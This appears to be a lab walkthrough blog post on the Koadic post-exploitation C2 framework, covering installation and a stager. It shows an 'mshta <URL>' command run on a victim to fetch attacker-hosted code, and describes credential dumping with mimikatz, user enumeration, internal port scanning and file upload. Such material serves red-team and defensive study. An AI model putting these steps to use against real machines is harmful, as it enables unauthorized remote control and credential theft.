Today I'd like to write about another post-exploit kit, the Koadic C2. While it seems like there are dozens of C2 options out there (including Cobalt Strike), I wanted to investigate Koadic anyway. To get started, we can quickly and easily install via:
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
./koadic
Once we are up and running, we will see this menu:
A simple ? will show us the commands we can run:
As you can already see, there is similarities to tools like Empire. It is worth noting that the "victims" are referred to as zombies within this tool. There is also ...taco time?
Ha, I guess it is exactly what it claims to be. Getting serious now, let's get us a zombie!
Step one is to set up a stager. The tool starts you within the stager mshta. According to their video, it is the smallest and most reliable option. So let's type in info and see what options we need to set.
Easily enough, we just need to set up our callback host and port. For the demo, let's leave that as default. Once those are set, simply run run to launch the stager. We'll be give a URL which the stager is using to receive zombies. Note that you should not edit this URL.
Now that the stager is running, we switch to our compromised host and use the URL within an mshta command. For the purposes of this demo, we'll have RDP access to the machine. Run mshta <URL> on the victim machine and you'll see a zombie check in on the attacker machine.
And we are successful!
From here, we can run zombies to see our list of zombies:
We can also get more detailed information by supplying an ID to the zombies command.
Now we should interact with our zombie. We can start with use implant and tab twice to see our options:
The implants are well organized, so we'll just pick inject to start with.
We can then use mimikatz_dotnet2js.
It is kind of neat that there is the option to target ALL zombies. Might make some noise though..
Anyway, all the options look fine, so lets run. The output is pretty standard for the mimitkatz command:
We should take a look at some of the other implants we can use.
That screenshot is trash, so lets instead dig in to some of the options that stand out.
Starting with implant/gather/ we have some valuable information to collect through our zombie. This includes clipboard data, domain info, shares, users, etc. As an example, to collect the users we can run use implant/gather/enum_users and then run. Interestingly, the results never showed up on my attacker machine. Instead, the job ran for some time and I noticed that the below window had appeared on my victim machine:
So I still got the information I was looking for, just in a strange way. I'm not sure if this is intended or not. We can also run use implant/scan/tcp to run a port scan from our zombie. I just left the defaults and targeted another machine in the lab:
Under implant/util/ we can upload or download a file. I'll create a test file and upload it to the zombie. Similar to the other modules, we just use the module and run options to see what info we need to provide. In this case, it is really just LFILE and the DIRECTORY options. I selected the Administrator's Desktop. Note that using \ caused an error while / was successful.
Over on the zombie, we can see the file on the Desktop:
That's about it for today. I've shown just how easy Koadic is as a C2 tool. I know there are more advanced features such as injecting straight into memory but I'll save that for another post (maybe). Hopefully this post helps you in some way and as always, thanks for reading!
